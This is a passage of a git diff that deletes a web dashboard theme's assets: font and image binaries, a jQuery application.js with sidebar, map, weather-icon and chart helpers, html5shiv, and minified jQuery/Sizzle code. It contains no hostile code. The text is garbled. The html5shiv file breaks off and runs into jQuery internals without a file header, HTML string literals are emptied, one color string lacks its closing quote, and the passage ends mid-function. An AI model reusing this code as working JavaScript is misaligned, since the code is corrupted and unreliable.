- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/newDesign/assets/fonts/fontawesome-webfont.ttf b/newDesign/assets/fonts/fontawesome-webfont.ttf deleted file mode 100644 index e89738de5..000000000 Binary files a/newDesign/assets/fonts/fontawesome-webfont.ttf and /dev/null differ 
diff --git a/newDesign/assets/fonts/fontawesome-webfont.woff b/newDesign/assets/fonts/fontawesome-webfont.woff
deleted file mode 100644
index 8c1748aab..000000000
Binary files a/newDesign/assets/fonts/fontawesome-webfont.woff and /dev/null differ
diff --git a/newDesign/assets/img/logo.png b/newDesign/assets/img/logo.png
deleted file mode 100644
index b71450f80..000000000
Binary files a/newDesign/assets/img/logo.png and /dev/null differ
diff --git a/newDesign/assets/img/logoBG.jpg b/newDesign/assets/img/logoBG.jpg
deleted file mode 100644
index cdc20d82e..000000000
Binary files a/newDesign/assets/img/logoBG.jpg and /dev/null differ
diff --git a/newDesign/assets/img/webBg.png b/newDesign/assets/img/webBg.png
deleted file mode 100644
index be3fbad98..000000000
Binary files a/newDesign/assets/img/webBg.png and /dev/null differ
diff --git a/newDesign/assets/js/application.js b/newDesign/assets/js/application.js
deleted file mode 100644
index 2cfda1cd9..000000000
--- a/newDesign/assets/js/application.js
+++ /dev/null
@@ -1,219 +0,0 @@
-var app = function() {
-
- var init = function() {
-
- tooltips();
- toggleMenuLeft();
- toggleMenuRight();
- menu();
- togglePanel();
- closePanel();
- };
-
- var tooltips = function() {
- $('#toggle-left').tooltip();
- };
-
- var togglePanel = function() {
- $('.actions > .fa-chevron-down').click(function() {
- $(this).parent().parent().next().slideToggle('fast');
- $(this).toggleClass('fa-chevron-down fa-chevron-up');
- });
-
- };
-
- var toggleMenuLeft = function() {
- $('#toggle-left').bind('click', function(e) {
- if (!$('.sidebarRight').hasClass('.sidebar-toggle-right')) {
- $('.sidebarRight').removeClass('sidebar-toggle-right');
- $('.main-content-wrapper').removeClass('main-content-toggle-right');
- }
- $('.sidebar').toggleClass('sidebar-toggle');
- $('.main-content-wrapper').toggleClass('main-content-toggle-left');
- e.stopPropagation();
- });
- };
-
- var toggleMenuRight = function() {
- $('#toggle-right').bind('click', function(e) {
-
- if (!$('.sidebar').hasClass('.sidebar-toggle')) {
- $('.sidebar').addClass('sidebar-toggle');
- $('.main-content-wrapper').addClass('main-content-toggle-left');
- }
-
- $('.sidebarRight').toggleClass('sidebar-toggle-right animated bounceInRight');
- $('.main-content-wrapper').toggleClass('main-content-toggle-right');
-
- if ( $(window).width() < 660 ) {
- $('.sidebar').removeClass('sidebar-toggle');
- $('.main-content-wrapper').removeClass('main-content-toggle-left main-content-toggle-right');
- };
-
- e.stopPropagation();
- });
- };
-
- var closePanel = function() {
- $('.actions > .fa-times').click(function() {
- $(this).parent().parent().parent().fadeOut();
- });
-
- }
-
- var menu = function() {
- $("#leftside-navigation .sub-menu > a").click(function(e) {
- $("#leftside-navigation ul ul").slideUp();
- if (!$(this).next().is(":visible")) {
- $(this).next().slideDown();
- }
- e.stopPropagation();
- });
- };
- //End functions
-
- //Dashboard functions
- var timer = function() {
- $('.timer').countTo();
- };
-
-
- //Vector Maps
- var map = function() {
- $('#map').vectorMap({
- map: 'world_mill_en',
- backgroundColor: 'transparent',
- regionStyle: {
- initial: {
- fill: '#1ABC9C',
- },
- hover: {
- "fill-opacity": 0.8
- }
- },
- markerStyle: {
- initial: {
- r: 10
- },
- hover: {
- r: 12,
- stroke: 'rgba(255,255,255,0.8)',
- "stroke-width": 3
- }
- },
- markers: [{
- latLng: [27.9881, 86.9253],
- name: '36 Employees',
- style: {
- fill: '#E84C3D',
- stroke: 'rgba(255,255,255,0.7)',
- "stroke-width": 3
- }
- }, {
- latLng: [48.8582, 2.2945],
- name: '58 Employees',
- style: {
- fill: '#E84C3D',
- stroke: 'rgba(255,255,255,0.7)',
- "stroke-width": 3
- }
- }, {
- latLng: [-40.6892, -74.0444],
- name: '109 Employees',
- style: {
- fill: '#E84C3D',
- stroke: 'rgba(255,255,255,0.7)',
- "stroke-width": 3
- }
- }, {
- latLng: [34.05, -118.25],
- name: '85 Employees ',
- style: {
- fill: '#E84C3D',
- stroke: 'rgba(255,255,255,0.7)',
- "stroke-width": 3
- }
- }]
- });
-
- };
-
- var weather = function() {
- var icons = new Skycons({
- "color": "white"
- });
-
- icons.set("clear-day", Skycons.CLEAR_DAY);
- icons.set("clear-night", Skycons.CLEAR_NIGHT);
- icons.set("partly-cloudy-day", Skycons.PARTLY_CLOUDY_DAY);
- icons.set("partly-cloudy-night", Skycons.PARTLY_CLOUDY_NIGHT);
- icons.set("cloudy", Skycons.CLOUDY);
- icons.set("rain", Skycons.RAIN);
- icons.set("sleet", Skycons.SLEET);
- icons.set("snow", Skycons.SNOW);
- icons.set("wind", Skycons.WIND);
- icons.set("fog", Skycons.FOG);
-
- icons.play();
- }
-
- //morris pie chart
- var morrisPie = function() {
-
- Morris.Donut({
- element: 'donut-example',
- data: [{
- label: "Chrome",
- value: 73
- }, {
- label: "Firefox",
- value: 71
- }, {
- label: "Safari",
- value: 69
- }, {
- label: "Internet Explorer",
- value: 40
- }, {
- label: "Opera",
- value: 20
- }, {
- label: "Android Browser",
- value: 10
- }
-
- ],
- colors: [
- '#1abc9c',
- '#293949',
- '#e84c3d',
- '#3598db',
- '#2dcc70',
- '#f1c40f
- ]
- });
- }
-
- //Sliders
- var sliders = function() {
- $('.slider-span').slider()
- };
-
-
- //return functions
- return {
- init: init,
- timer: timer,
- map: map,
- sliders: sliders,
- weather: weather,
- morrisPie: morrisPie
-
- };
-}();
-
-//Load global functions
-$(document).ready(function() {
- app.init();
-
-});
diff --git a/newDesign/assets/js/html5shiv.js b/newDesign/assets/js/html5shiv.js
deleted file mode 100644
index e2e00155b..000000000
--- a/newDesign/assets/js/html5shiv.js
+++ /dev/null
@@ -1,8 +0,0 @@ -/* - HTML5 Shiv v3.7.0 | @afarkas @jdalton @jon_neal @rem | MIT/GPL2 Licensed -*/ -(function(l,f){function m(){var a=e.elements;return"string"==typeof a?a.split(" "):a}function i(a){var b=n[a[o]];b||(b={},h++,a[o]=h,n[h]=b);return b}function p(a,b,c){b||(b=f);if(g)return b.createElement(a);c||(c=i(b));b=c.cache[a]?c.cache[a].cloneNode():r.test(a)?(c.cache[a]=c.createElem(a)).cloneNode():c.createElem(a);return b.canHaveChildren&&!s.test(a)?c.frag.appendChild(b):b}function t(a,b){if(!b.cache)b.cache={},b.createElem=a.createElement,b.createFrag=a.createDocumentFragment,b.frag=b.createFrag(); -a.createElement=function(c){return!e.shivMethods?b.createElem(c):p(c,a,b)};a.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&("+m().join().replace(/[\w\-]+/g,function(a){b.createElem(a);b.frag.createElement(a);return'c("'+a+'")'})+");return n}")(e,b.frag)}function q(a){a||(a=f);var b=i(a);if(e.shivCSS&&!j&&!b.hasCSS){var c,d=a;c=d.createElement("p");d=d.getElementsByTagName("head")[0]||d.documentElement;c.innerHTML="x"; -c=d.insertBefore(c.lastChild,d.firstChild);b.hasCSS=!!c}g||t(a,b);return a}var k=l.html5||{},s=/^<|^(?:button|map|select|textarea|object|iframe|option|optgroup)$/i,r=/^(?:a|b|code|div|fieldset|h1|h2|h3|h4|h5|h6|i|label|li|ol|p|q|span|strong|style|table|tbody|td|th|tr|ul)$/i,j,o="_html5shiv",h=0,n={},g;(function(){try{var a=f.createElement("a");a.innerHTML="";j="hidden"in a;var b;if(!(b=1==a.childNodes.length)){f.createElement("a");var c=f.createDocumentFragment();b="undefined"==typeof c.cloneNode|| -"undefined"==typeof c.createDocumentFragment||"undefined"==typeof c.createElement}g=b}catch(d){g=j=!0}})();var e={elements:k.elements||"abbr article aside audio bdi canvas data datalist details dialog figcaption figure footer header hgroup main mark meter nav output progress section summary template time 
video",version:"3.7.0",shivCSS:!1!==k.shivCSS,supportsUnknownElements:g,shivMethods:!1!==k.shivMethods,type:"default",shivDocument:q,createElement:p,createDocumentFragment:function(a,b){a||(a=f); -if(g)return a.createDocumentFragment();for(var b=b||i(a),c=b.frag.cloneNode(),d=0,e=m(),h=e.length;d)[^>]*|#([\w-]*))$/,k=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,E=/^[\],:{}\s]*$/,S=/(?:^|:|,)(?:\s*\[)+/g,A=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,j=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,D=/^-ms-/,L=/-([\da-z])/gi,H=function(e,t){return t.toUpperCase()},q=function(e){(a.addEventListener||"load"===e.type||"complete"===a.readyState)&&(_(),x.ready())},_=function(){a.addEventListener?(a.removeEventListener("DOMContentLoaded",q,!1),e.removeEventListener("load",q,!1)):(a.detachEvent("onreadystatechange",q),e.detachEvent("onload",q))};x.fn=x.prototype={jquery:f,constructor:x,init:function(e,n,r){var i,o;if(!e)return this;if("string"==typeof e){if(i="<"===e.charAt(0)&&">"===e.charAt(e.length-1)&&e.length>=3?[null,e,null]:N.exec(e),!i||!i[1]&&n)return!n||n.jquery?(n||r).find(e):this.constructor(n).find(e);if(i[1]){if(n=n instanceof x?n[0]:n,x.merge(this,x.parseHTML(i[1],n&&n.nodeType?n.ownerDocument||n:a,!0)),k.test(i[1])&&x.isPlainObject(n))for(i in n)x.isFunction(this[i])?this[i](n[i]):this.attr(i,n[i]);return this}if(o=a.getElementById(i[2]),o&&o.parentNode){if(o.id!==i[2])return r.find(e);this.length=1,this[0]=o}return this.context=a,this.selector=e,this}return e.nodeType?(this.context=this[0]=e,this.length=1,this):x.isFunction(e)?r.ready(e):(e.selector!==t&&(this.selector=e.selector,this.context=e.context),x.makeArray(e,this))},selector:"",length:0,toArray:function(){return g.call(this)},get:function(e){return null==e?this.toArray():0>e?this[this.length+e]:this[e]},pushStack:function(e){var t=x.merge(this.constructor(),e);return t.prevObject=this,t.context=this.context,t},each:function(e,t){return x.each(this,e,t)},ready:function(e){return 
x.ready.promise().done(e),this},slice:function(){return this.pushStack(g.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(0>e?t:0);return this.pushStack(n>=0&&t>n?[this[n]]:[])},map:function(e){return this.pushStack(x.map(this,function(t,n){return e.call(t,n,t)}))},end:function(){return this.prevObject||this.constructor(null)},push:h,sort:[].sort,splice:[].splice},x.fn.init.prototype=x.fn,x.extend=x.fn.extend=function(){var e,n,r,i,o,a,s=arguments[0]||{},l=1,u=arguments.length,c=!1;for("boolean"==typeof s&&(c=s,s=arguments[1]||{},l=2),"object"==typeof s||x.isFunction(s)||(s={}),u===l&&(s=this,--l);u>l;l++)if(null!=(o=arguments[l]))for(i in o)e=s[i],r=o[i],s!==r&&(c&&r&&(x.isPlainObject(r)||(n=x.isArray(r)))?(n?(n=!1,a=e&&x.isArray(e)?e:[]):a=e&&x.isPlainObject(e)?e:{},s[i]=x.extend(c,a,r)):r!==t&&(s[i]=r));return s},x.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),noConflict:function(t){return e.$===x&&(e.$=u),t&&e.jQuery===x&&(e.jQuery=l),x},isReady:!1,readyWait:1,holdReady:function(e){e?x.readyWait++:x.ready(!0)},ready:function(e){if(e===!0?!--x.readyWait:!x.isReady){if(!a.body)return setTimeout(x.ready);x.isReady=!0,e!==!0&&--x.readyWait>0||(n.resolveWith(a,[x]),x.fn.trigger&&x(a).trigger("ready").off("ready"))}},isFunction:function(e){return"function"===x.type(e)},isArray:Array.isArray||function(e){return"array"===x.type(e)},isWindow:function(e){return null!=e&&e==e.window},isNumeric:function(e){return!isNaN(parseFloat(e))&&isFinite(e)},type:function(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?c[y.call(e)]||"object":typeof e},isPlainObject:function(e){var n;if(!e||"object"!==x.type(e)||e.nodeType||x.isWindow(e))return!1;try{if(e.constructor&&!v.call(e,"constructor")&&!v.call(e.constructor.prototype,"isPrototypeOf"))return!1}catch(r){return!1}if(x.support.ownLast)for(n in e)return v.call(e,n);for(n in e);return 
n===t||v.call(e,n)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},error:function(e){throw Error(e)},parseHTML:function(e,t,n){if(!e||"string"!=typeof e)return null;"boolean"==typeof t&&(n=t,t=!1),t=t||a;var r=k.exec(e),i=!n&&[];return r?[t.createElement(r[1])]:(r=x.buildFragment([e],t,i),i&&x(i).remove(),x.merge([],r.childNodes))},parseJSON:function(n){return e.JSON&&e.JSON.parse?e.JSON.parse(n):null===n?n:"string"==typeof n&&(n=x.trim(n),n&&E.test(n.replace(A,"@").replace(j,"]").replace(S,"")))?Function("return "+n)():(x.error("Invalid JSON: "+n),t)},parseXML:function(n){var r,i;if(!n||"string"!=typeof n)return null;try{e.DOMParser?(i=new DOMParser,r=i.parseFromString(n,"text/xml")):(r=new ActiveXObject("Microsoft.XMLDOM"),r.async="false",r.loadXML(n))}catch(o){r=t}return r&&r.documentElement&&!r.getElementsByTagName("parsererror").length||x.error("Invalid XML: "+n),r},noop:function(){},globalEval:function(t){t&&x.trim(t)&&(e.execScript||function(t){e.eval.call(e,t)})(t)},camelCase:function(e){return e.replace(D,"ms-").replace(L,H)},nodeName:function(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()},each:function(e,t,n){var r,i=0,o=e.length,a=M(e);if(n){if(a){for(;o>i;i++)if(r=t.apply(e[i],n),r===!1)break}else for(i in e)if(r=t.apply(e[i],n),r===!1)break}else if(a){for(;o>i;i++)if(r=t.call(e[i],i,e[i]),r===!1)break}else for(i in e)if(r=t.call(e[i],i,e[i]),r===!1)break;return e},trim:b&&!b.call("\ufeff\u00a0")?function(e){return null==e?"":b.call(e)}:function(e){return null==e?"":(e+"").replace(C,"")},makeArray:function(e,t){var n=t||[];return null!=e&&(M(Object(e))?x.merge(n,"string"==typeof e?[e]:e):h.call(n,e)),n},inArray:function(e,t,n){var r;if(t){if(m)return m.call(t,e,n);for(r=t.length,n=n?0>n?Math.max(0,r+n):n:0;r>n;n++)if(n in t&&t[n]===e)return n}return-1},merge:function(e,n){var r=n.length,i=e.length,o=0;if("number"==typeof r)for(;r>o;o++)e[i++]=n[o];else while(n[o]!==t)e[i++]=n[o++];return 
e.length=i,e},grep:function(e,t,n){var r,i=[],o=0,a=e.length;for(n=!!n;a>o;o++)r=!!t(e[o],o),n!==r&&i.push(e[o]);return i},map:function(e,t,n){var r,i=0,o=e.length,a=M(e),s=[];if(a)for(;o>i;i++)r=t(e[i],i,n),null!=r&&(s[s.length]=r);else for(i in e)r=t(e[i],i,n),null!=r&&(s[s.length]=r);return d.apply([],s)},guid:1,proxy:function(e,n){var r,i,o;return"string"==typeof n&&(o=e[n],n=e,e=o),x.isFunction(e)?(r=g.call(arguments,2),i=function(){return e.apply(n||this,r.concat(g.call(arguments)))},i.guid=e.guid=e.guid||x.guid++,i):t},access:function(e,n,r,i,o,a,s){var l=0,u=e.length,c=null==r;if("object"===x.type(r)){o=!0;for(l in r)x.access(e,n,l,r[l],!0,a,s)}else if(i!==t&&(o=!0,x.isFunction(i)||(s=!0),c&&(s?(n.call(e,i),n=null):(c=n,n=function(e,t,n){return c.call(x(e),n)})),n))for(;u>l;l++)n(e[l],r,s?i:i.call(e[l],l,n(e[l],r)));return o?e:c?n.call(e):u?n(e[0],r):a},now:function(){return(new Date).getTime()},swap:function(e,t,n,r){var i,o,a={};for(o in t)a[o]=e.style[o],e.style[o]=t[o];i=n.apply(e,r||[]);for(o in t)e.style[o]=a[o];return i}}),x.ready.promise=function(t){if(!n)if(n=x.Deferred(),"complete"===a.readyState)setTimeout(x.ready);else if(a.addEventListener)a.addEventListener("DOMContentLoaded",q,!1),e.addEventListener("load",q,!1);else{a.attachEvent("onreadystatechange",q),e.attachEvent("onload",q);var r=!1;try{r=null==e.frameElement&&a.documentElement}catch(i){}r&&r.doScroll&&function o(){if(!x.isReady){try{r.doScroll("left")}catch(e){return setTimeout(o,50)}_(),x.ready()}}()}return n.promise(t)},x.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(e,t){c["[object "+t+"]"]=t.toLowerCase()});function M(e){var t=e.length,n=x.type(e);return x.isWindow(e)?!1:1===e.nodeType&&t?!0:"array"===n||"function"!==n&&(0===t||"number"==typeof t&&t>0&&t-1 in e)}r=x(a),function(e,t){var n,r,i,o,a,s,l,u,c,p,f,d,h,g,m,y,v,b="sizzle"+-new Date,w=e.document,T=0,C=0,N=st(),k=st(),E=st(),S=!1,A=function(e,t){return e===t?(S=!0,0):0},j=typeof 
t,D=1<<31,L={}.hasOwnProperty,H=[],q=H.pop,_=H.push,M=H.push,O=H.slice,F=H.indexOf||function(e){var t=0,n=this.length;for(;n>t;t++)if(this[t]===e)return t;return-1},B="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",P="[\\x20\\t\\r\\n\\f]",R="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",W=R.replace("w","w#"),$="\\["+P+"*("+R+")"+P+"*(?:([*^$|!~]?=)"+P+"*(?:(['\"])((?:\\\\.|[^\\\\])*?)\\3|("+W+")|)|)"+P+"*\\]",I=":("+R+")(?:\\(((['\"])((?:\\\\.|[^\\\\])*?)\\3|((?:\\\\.|[^\\\\()[\\]]|"+$.replace(3,8)+")*)|.*)\\)|)",z=RegExp("^"+P+"+|((?:^|[^\\\\])(?:\\\\.)*)"+P+"+$","g"),X=RegExp("^"+P+"*,"+P+"*"),U=RegExp("^"+P+"*([>+~]|"+P+")"+P+"*"),V=RegExp(P+"*[+~]"),Y=RegExp("="+P+"*([^\\]'\"]*)"+P+"*\\]","g"),J=RegExp(I),G=RegExp("^"+W+"$"),Q={ID:RegExp("^#("+R+")"),CLASS:RegExp("^\\.("+R+")"),TAG:RegExp("^("+R.replace("w","w*")+")"),ATTR:RegExp("^"+$),PSEUDO:RegExp("^"+I),CHILD:RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+P+"*(even|odd|(([+-]|)(\\d*)n|)"+P+"*(?:([+-]|)"+P+"*(\\d+)|))"+P+"*\\)|)","i"),bool:RegExp("^(?:"+B+")$","i"),needsContext:RegExp("^"+P+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+P+"*((?:-\\d)?\\d*)"+P+"*\\)|)(?=[^-]|$)","i")},K=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,et=/^(?:input|select|textarea|button)$/i,tt=/^h\d$/i,nt=/'|\\/g,rt=RegExp("\\\\([\\da-f]{1,6}"+P+"?|("+P+")|.)","ig"),it=function(e,t,n){var r="0x"+t-65536;return r!==r||n?t:0>r?String.fromCharCode(r+65536):String.fromCharCode(55296|r>>10,56320|1023&r)};try{M.apply(H=O.call(w.childNodes),w.childNodes),H[w.childNodes.length].nodeType}catch(ot){M={apply:H.length?function(e,t){_.apply(e,O.call(t))}:function(e,t){var n=e.length,r=0;while(e[n++]=t[r++]);e.length=n-1}}}function at(e,t,n,i){var o,a,s,l,u,c,d,m,y,x;if((t?t.ownerDocument||t:w)!==f&&p(t),t=t||f,n=n||[],!e||"string"!=typeof e)return 
n;if(1!==(l=t.nodeType)&&9!==l)return[];if(h&&!i){if(o=Z.exec(e))if(s=o[1]){if(9===l){if(a=t.getElementById(s),!a||!a.parentNode)return n;if(a.id===s)return n.push(a),n}else if(t.ownerDocument&&(a=t.ownerDocument.getElementById(s))&&v(t,a)&&a.id===s)return n.push(a),n}else{if(o[2])return M.apply(n,t.getElementsByTagName(e)),n;if((s=o[3])&&r.getElementsByClassName&&t.getElementsByClassName)return M.apply(n,t.getElementsByClassName(s)),n}if(r.qsa&&(!g||!g.test(e))){if(m=d=b,y=t,x=9===l&&e,1===l&&"object"!==t.nodeName.toLowerCase()){c=mt(e),(d=t.getAttribute("id"))?m=d.replace(nt,"\\$&"):t.setAttribute("id",m),m="[id='"+m+"'] ",u=c.length;while(u--)c[u]=m+yt(c[u]);y=V.test(e)&&t.parentNode||t,x=c.join(",")}if(x)try{return M.apply(n,y.querySelectorAll(x)),n}catch(T){}finally{d||t.removeAttribute("id")}}}return kt(e.replace(z,"$1"),t,n,i)}function st(){var e=[];function t(n,r){return e.push(n+=" ")>o.cacheLength&&delete t[e.shift()],t[n]=r}return t}function lt(e){return e[b]=!0,e}function ut(e){var t=f.createElement("div");try{return!!e(t)}catch(n){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function ct(e,t){var n=e.split("|"),r=e.length;while(r--)o.attrHandle[n[r]]=t}function pt(e,t){var n=t&&e,r=n&&1===e.nodeType&&1===t.nodeType&&(~t.sourceIndex||D)-(~e.sourceIndex||D);if(r)return r;if(n)while(n=n.nextSibling)if(n===t)return-1;return e?1:-1}function ft(e){return function(t){var n=t.nodeName.toLowerCase();return"input"===n&&t.type===e}}function dt(e){return function(t){var n=t.nodeName.toLowerCase();return("input"===n||"button"===n)&&t.type===e}}function ht(e){return lt(function(t){return t=+t,lt(function(n,r){var i,o=e([],n.length,t),a=o.length;while(a--)n[i=o[a]]&&(n[i]=!(r[i]=n[i]))})})}s=at.isXML=function(e){var t=e&&(e.ownerDocument||e).documentElement;return t?"HTML"!==t.nodeName:!1},r=at.support={},p=at.setDocument=function(e){var n=e?e.ownerDocument||e:w,i=n.defaultView;return 
n!==f&&9===n.nodeType&&n.documentElement?(f=n,d=n.documentElement,h=!s(n),i&&i.attachEvent&&i!==i.top&&i.attachEvent("onbeforeunload",function(){p()}),r.attributes=ut(function(e){return e.className="i",!e.getAttribute("className")}),r.getElementsByTagName=ut(function(e){return e.appendChild(n.createComment("")),!e.getElementsByTagName("*").length}),r.getElementsByClassName=ut(function(e){return e.innerHTML="
",e.firstChild.className="i",2===e.getElementsByClassName("i").length}),r.getById=ut(function(e){return d.appendChild(e).id=b,!n.getElementsByName||!n.getElementsByName(b).length}),r.getById?(o.find.ID=function(e,t){if(typeof t.getElementById!==j&&h){var n=t.getElementById(e);return n&&n.parentNode?[n]:[]}},o.filter.ID=function(e){var t=e.replace(rt,it);return function(e){return e.getAttribute("id")===t}}):(delete o.find.ID,o.filter.ID=function(e){var t=e.replace(rt,it);return function(e){var n=typeof e.getAttributeNode!==j&&e.getAttributeNode("id");return n&&n.value===t}}),o.find.TAG=r.getElementsByTagName?function(e,n){return typeof n.getElementsByTagName!==j?n.getElementsByTagName(e):t}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){while(n=o[i++])1===n.nodeType&&r.push(n);return r}return o},o.find.CLASS=r.getElementsByClassName&&function(e,n){return typeof n.getElementsByClassName!==j&&h?n.getElementsByClassName(e):t},m=[],g=[],(r.qsa=K.test(n.querySelectorAll))&&(ut(function(e){e.innerHTML="",e.querySelectorAll("[selected]").length||g.push("\\["+P+"*(?:value|"+B+")"),e.querySelectorAll(":checked").length||g.push(":checked")}),ut(function(e){var t=n.createElement("input");t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("t",""),e.querySelectorAll("[t^='']").length&&g.push("[*^$]="+P+"*(?:''|\"\")"),e.querySelectorAll(":enabled").length||g.push(":enabled",":disabled"),e.querySelectorAll("*,:x"),g.push(",.*:")})),(r.matchesSelector=K.test(y=d.webkitMatchesSelector||d.mozMatchesSelector||d.oMatchesSelector||d.msMatchesSelector))&&ut(function(e){r.disconnectedMatch=y.call(e,"div"),y.call(e,"[s!='']:x"),m.push("!=",I)}),g=g.length&&RegExp(g.join("|")),m=m.length&&RegExp(m.join("|")),v=K.test(d.contains)||d.compareDocumentPosition?function(e,t){var n=9===e.nodeType?e.documentElement:e,r=t&&t.parentNode;return 
e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!0;return!1},A=d.compareDocumentPosition?function(e,t){if(e===t)return S=!0,0;var i=t.compareDocumentPosition&&e.compareDocumentPosition&&e.compareDocumentPosition(t);return i?1&i||!r.sortDetached&&t.compareDocumentPosition(e)===i?e===n||v(w,e)?-1:t===n||v(w,t)?1:c?F.call(c,e)-F.call(c,t):0:4&i?-1:1:e.compareDocumentPosition?-1:1}:function(e,t){var r,i=0,o=e.parentNode,a=t.parentNode,s=[e],l=[t];if(e===t)return S=!0,0;if(!o||!a)return e===n?-1:t===n?1:o?-1:a?1:c?F.call(c,e)-F.call(c,t):0;if(o===a)return pt(e,t);r=e;while(r=r.parentNode)s.unshift(r);r=t;while(r=r.parentNode)l.unshift(r);while(s[i]===l[i])i++;return i?pt(s[i],l[i]):s[i]===w?-1:l[i]===w?1:0},n):f},at.matches=function(e,t){return at(e,null,null,t)},at.matchesSelector=function(e,t){if((e.ownerDocument||e)!==f&&p(e),t=t.replace(Y,"='$1']"),!(!r.matchesSelector||!h||m&&m.test(t)||g&&g.test(t)))try{var n=y.call(e,t);if(n||r.disconnectedMatch||e.document&&11!==e.document.nodeType)return n}catch(i){}return at(t,f,null,[e]).length>0},at.contains=function(e,t){return(e.ownerDocument||e)!==f&&p(e),v(e,t)},at.attr=function(e,n){(e.ownerDocument||e)!==f&&p(e);var i=o.attrHandle[n.toLowerCase()],a=i&&L.call(o.attrHandle,n.toLowerCase())?i(e,n,!h):t;return a===t?r.attributes||!h?e.getAttribute(n):(a=e.getAttributeNode(n))&&a.specified?a.value:null:a},at.error=function(e){throw Error("Syntax error, unrecognized expression: "+e)},at.uniqueSort=function(e){var t,n=[],i=0,o=0;if(S=!r.detectDuplicates,c=!r.sortStable&&e.slice(0),e.sort(A),S){while(t=e[o++])t===e[o]&&(i=n.push(o));while(i--)e.splice(n[i],1)}return e},a=at.getText=function(e){var t,n="",r=0,i=e.nodeType;if(i){if(1===i||9===i||11===i){if("string"==typeof e.textContent)return e.textContent;for(e=e.firstChild;e;e=e.nextSibling)n+=a(e)}else if(3===i||4===i)return e.nodeValue}else 
for(;t=e[r];r++)n+=a(t);return n},o=at.selectors={cacheLength:50,createPseudo:lt,match:Q,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){return e[1]=e[1].replace(rt,it),e[3]=(e[4]||e[5]||"").replace(rt,it),"~="===e[2]&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),"nth"===e[1].slice(0,3)?(e[3]||at.error(e[0]),e[4]=+(e[4]?e[5]+(e[6]||1):2*("even"===e[3]||"odd"===e[3])),e[5]=+(e[7]+e[8]||"odd"===e[3])):e[3]&&at.error(e[0]),e},PSEUDO:function(e){var n,r=!e[5]&&e[2];return Q.CHILD.test(e[0])?null:(e[3]&&e[4]!==t?e[2]=e[4]:r&&J.test(r)&&(n=mt(r,!0))&&(n=r.indexOf(")",r.length-n)-r.length)&&(e[0]=e[0].slice(0,n),e[2]=r.slice(0,n)),e.slice(0,3))}},filter:{TAG:function(e){var t=e.replace(rt,it).toLowerCase();return"*"===e?function(){return!0}:function(e){return e.nodeName&&e.nodeName.toLowerCase()===t}},CLASS:function(e){var t=N[e+" "];return t||(t=RegExp("(^|"+P+")"+e+"("+P+"|$)"))&&N(e,function(e){return t.test("string"==typeof e.className&&e.className||typeof e.getAttribute!==j&&e.getAttribute("class")||"")})},ATTR:function(e,t,n){return function(r){var i=at.attr(r,e);return null==i?"!="===t:t?(i+="","="===t?i===n:"!="===t?i!==n:"^="===t?n&&0===i.indexOf(n):"*="===t?n&&i.indexOf(n)>-1:"$="===t?n&&i.slice(-n.length)===n:"~="===t?(" "+i+" ").indexOf(n)>-1:"|="===t?i===n||i.slice(0,n.length+1)===n+"-":!1):!0}},CHILD:function(e,t,n,r,i){var o="nth"!==e.slice(0,3),a="last"!==e.slice(-4),s="of-type"===t;return 1===r&&0===i?function(e){return!!e.parentNode}:function(t,n,l){var 
u,c,p,f,d,h,g=o!==a?"nextSibling":"previousSibling",m=t.parentNode,y=s&&t.nodeName.toLowerCase(),v=!l&&!s;if(m){if(o){while(g){p=t;while(p=p[g])if(s?p.nodeName.toLowerCase()===y:1===p.nodeType)return!1;h=g="only"===e&&!h&&"nextSibling"}return!0}if(h=[a?m.firstChild:m.lastChild],a&&v){c=m[b]||(m[b]={}),u=c[e]||[],d=u[0]===T&&u[1],f=u[0]===T&&u[2],p=d&&m.childNodes[d];while(p=++d&&p&&p[g]||(f=d=0)||h.pop())if(1===p.nodeType&&++f&&p===t){c[e]=[T,d,f];break}}else if(v&&(u=(t[b]||(t[b]={}))[e])&&u[0]===T)f=u[1];else while(p=++d&&p&&p[g]||(f=d=0)||h.pop())if((s?p.nodeName.toLowerCase()===y:1===p.nodeType)&&++f&&(v&&((p[b]||(p[b]={}))[e]=[T,f]),p===t))break;return f-=i,f===r||0===f%r&&f/r>=0}}},PSEUDO:function(e,t){var n,r=o.pseudos[e]||o.setFilters[e.toLowerCase()]||at.error("unsupported pseudo: "+e);return r[b]?r(t):r.length>1?(n=[e,e,"",t],o.setFilters.hasOwnProperty(e.toLowerCase())?lt(function(e,n){var i,o=r(e,t),a=o.length;while(a--)i=F.call(e,o[a]),e[i]=!(n[i]=o[a])}):function(e){return r(e,0,n)}):r}},pseudos:{not:lt(function(e){var t=[],n=[],r=l(e.replace(z,"$1"));return r[b]?lt(function(e,t,n,i){var 